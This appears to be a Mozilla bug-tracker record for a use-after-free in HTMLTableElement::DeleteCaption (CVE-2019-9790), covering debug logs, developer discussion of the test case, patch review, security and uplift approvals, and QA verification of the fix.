--DOMWINDOW == 26 (0x6190009ffb80) [pid = 32513] [serial = 27] [outer = (nil)] [url = about:tabcrashed?e=tabcrashed&u=http%3A//127.0.0.1%3A8080/crash.html&c=UTF-8&f=regular&d=%20]
--DOMWINDOW == 25 (0x61900084a880) [pid = 32513] [serial = 38] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 24 (0x6190007bc580) [pid = 32513] [serial = 34] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 23 (0x619000137980) [pid = 32513] [serial = 30] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 22 (0x6190001f5e80) [pid = 32513] [serial = 31] [outer = (nil)] [url = about:devtools-toolbox]
--DOMWINDOW == 21 (0x619001205c80) [pid = 32513] [serial = 33] [outer = (nil)] [url = about:blank]
[Parent 32513, Main Thread] WARNING: Found a principal with no URI, assuming third-party request: file /builds/worker/workspace/build/src/dom/base/ThirdPartyUtil.cpp, line 226
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122
[Parent 32513, Main Thread] WARNING: Found a principal with no URI, assuming third-party request: file /builds/worker/workspace/build/src/dom/base/ThirdPartyUtil.cpp, line 226
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122

It seems like I'm not removing the caption in time for it to crash. I wonder why? Based upon the code it does look like it should be a Use After Free but in practice it's just failing on the assertion.

Flags: needinfo?(wieser.brandon)

Generally, you should use a non-debug ASan build to demonstrate a UAF, though of course seeing what asserts get hit in a debug build is also useful to diagnose the issue.

Summary: Use After Free In HTMLTableElment::DeleteCaption Crashing Proof of Concept Included → Use After Free In HTMLTableElment::DeleteCaption

For what it is worth, I was able to reproduce the assertion using the test case in comment 7 in a debug ASan build, but nothing happened in a non-debug ASan build.

Debug build asserts too. The assertion is wrong there.

Priority: -- → P1

Yeah, I'm getting only that somewhat harmless assertion with asan-debug too.

So this patch is based on code inspection. nsINode::RemoveChild may dispatch DOMNodeRemoved, and anything can happen at that time, so arguments should be kept alive.
Feel free to prove me wrong :)

I think IgnoredErrorResult is fine here, since it throws if the node is already removed.

Attachment #9041604 - Flags: review?(peterv)
Attachment #9041604 - Flags: review?(peterv) → review+

Comment on attachment 9041604 [details] [diff] [review]
table_crashes.diff

Security Approval Request

How easily could an exploit be constructed based on the patch?

The changes do pinpoint the issue. (The testcases in this bug seem to just trigger a somewhat harmless assertion.)

Commit message could be
-m " Bug 1525145, remove harmless assertions by using IgnoredErrorResult, r=peterv"

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No

Which older supported branches are affected by this flaw?

all

If not all supported branches, which bug introduced the flaw?

None

Do you have backports for the affected branches?

Yes

If not, how different, hard to create, and risky will they be?

How likely is this patch to cause regressions; how much testing does it need?

Very unlikely to cause regressions. Just keeping objects a tiny bit longer alive in an edge case.

Attachment #9041604 - Flags: sec-approval?
Comment on attachment 9041604 [details] [diff] [review]
table_crashes.diff

sec-approval+ for trunk. We'll want a beta and ESR60 patch.
Attachment #9041604 - Flags: sec-approval? → sec-approval+

The patch should apply to beta and esr60 too.

Hmm, perhaps I'm misinterpreting "### Do you have backports for the affected branches?" in the wrong way? I thought if I say yes, it means the patches uploaded to the bug are enough to cover the branches too.

Comment on attachment 9041604 [details] [diff] [review]
table_crashes.diff

Beta/Release Uplift Approval Request

Feature/Bug causing the regression

None

User impact if declined

possible crashes

Is this code covered by automated tests?

No

Has the fix been verified in Nightly?

No

Needs manual test from QE?

No

If yes, steps to reproduce

List of other uplifts needed

None

Risk to taking this patch

Low

Why is the change risky/not risky? (and alternatives if risky)

Basically adding a kungfuDeathGrip

String changes made/needed

NA

Attachment #9041604 - Flags: approval-mozilla-esr60?
Attachment #9041604 - Flags: approval-mozilla-beta?

Is this still waiting to land on mozilla-central?

Flags: needinfo?(bugs)
Group: dom-core-security → core-security-release
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla67
Comment on attachment 9041604 [details] [diff] [review]
table_crashes.diff

sec-critical uaf fix, approved for 66.0b9
Attachment #9041604 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Flags: needinfo?(bugs)
Flags: sec-bounty? → sec-bounty+
Flags: qe-verify+
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][qa-triaged]

Hello,

I have managed to reproduce this issue with the 67.0a1 (20190204214259) ASan debug build from 2019-02-04 on Ubuntu 16.04 x64.

Confirming this issue as verified fixed on 66.0b10 (20190221023827) and 67.0a1 (20190221102221) with Ubuntu 16.04 x64.

Status: RESOLVED → VERIFIED
Flags: qe-verify+
Comment on attachment 9041604 [details] [diff] [review]
table_crashes.diff

Sec-crit fix verified by QA. Approved for 60.6esr.
Attachment #9041604 - Flags: approval-mozilla-esr60? → approval-mozilla-esr60+
QA Whiteboard: [qa-triaged]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][qa-triaged] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]

Confirming this issue as verified fixed with 60.6.0esr (20190313091946) on Ubuntu 16.04 x64.

Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main66+][adv-esr60.6+]
Alias: CVE-2019-9790
Group: core-security-release